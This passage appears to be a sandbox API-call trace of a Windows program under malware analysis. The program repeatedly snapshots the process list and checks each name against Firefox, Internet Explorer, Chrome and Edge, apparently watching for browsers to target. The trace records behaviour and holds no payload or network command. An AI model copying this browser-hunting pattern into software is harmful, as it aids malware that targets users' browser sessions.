[0245.234] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0245.234] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0245.234] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0245.234] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0245.234] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0245.235] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0245.235] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0245.235] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0245.235] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0245.235] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0245.235] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0245.235] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0245.235] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0245.235] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0245.235] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0245.236] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0245.236] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0245.236] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0245.236] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0245.236] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 0 [0245.236] CloseHandle (hObject=0xd4) returned 1 [0245.236] Sleep (dwMilliseconds=0x3e8) [0246.247] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0246.249] Process32First (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0246.249] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0246.249] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0246.249] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0246.249] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0246.249] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0246.250] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0246.250] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0246.250] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0246.250] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0246.250] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0246.250] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0246.250] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0246.250] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0246.250] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0246.250] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0246.251] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0246.251] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0246.251] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0246.251] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0246.251] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0246.251] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0246.251] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0246.251] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0246.251] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0246.251] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0246.252] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0246.252] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0246.252] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0246.252] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0246.252] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0246.252] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0246.252] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0246.253] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0246.253] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0246.253] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0246.253] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0246.253] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0246.253] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0246.253] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0246.253] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0246.254] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0246.254] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0246.254] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0246.254] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0246.254] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0246.254] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0246.254] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0246.254] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0246.254] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0246.254] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0246.255] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0246.255] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0246.255] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0246.255] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0246.255] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0246.256] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0246.256] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0246.256] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0246.256] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0246.256] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0246.256] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0246.256] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0246.256] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0246.256] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0246.256] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0246.257] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0246.257] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0246.257] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0246.257] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0246.257] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0246.257] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0246.257] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0246.257] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0246.257] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0246.257] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0246.258] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0246.258] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0246.258] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0246.258] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0246.258] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0246.258] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0246.258] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0246.258] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0246.258] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0246.258] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0246.259] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0246.259] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0246.259] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0246.259] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0246.259] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0246.260] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0246.260] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0246.260] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0246.260] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0246.260] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0246.260] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0246.260] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0246.260] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0246.260] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0246.260] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0246.261] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0246.261] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0246.261] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0246.261] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0246.261] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0246.261] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0246.261] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0246.261] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0246.261] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0246.261] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0246.262] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0246.262] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0246.262] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0246.262] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0246.262] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0246.262] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0246.262] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0246.262] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0246.262] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0246.262] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0246.263] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0246.263] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0246.263] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0246.263] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0246.263] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0246.263] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0246.264] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0246.264] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0246.264] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0246.264] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0246.264] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0246.264] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0246.264] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0246.264] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0246.264] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0246.265] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0246.265] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0246.265] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0246.265] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0246.265] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0246.265] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0246.265] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0246.265] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0246.265] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0246.265] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0246.266] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0246.266] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0246.266] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0246.266] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0246.266] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0246.266] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0246.266] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0246.266] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0246.266] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0246.266] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0246.267] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0246.267] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0246.267] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0246.267] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0246.267] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0246.267] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0246.267] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0246.267] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0246.267] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0246.268] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0246.268] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0246.268] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0246.268] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0246.268] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0246.268] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0246.269] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0246.269] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0246.269] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0246.269] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0246.269] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0246.269] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0246.269] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0246.269] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0246.269] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0246.269] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0246.270] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0246.270] lstrcmpiA (lpString1="spicedespite.exe", 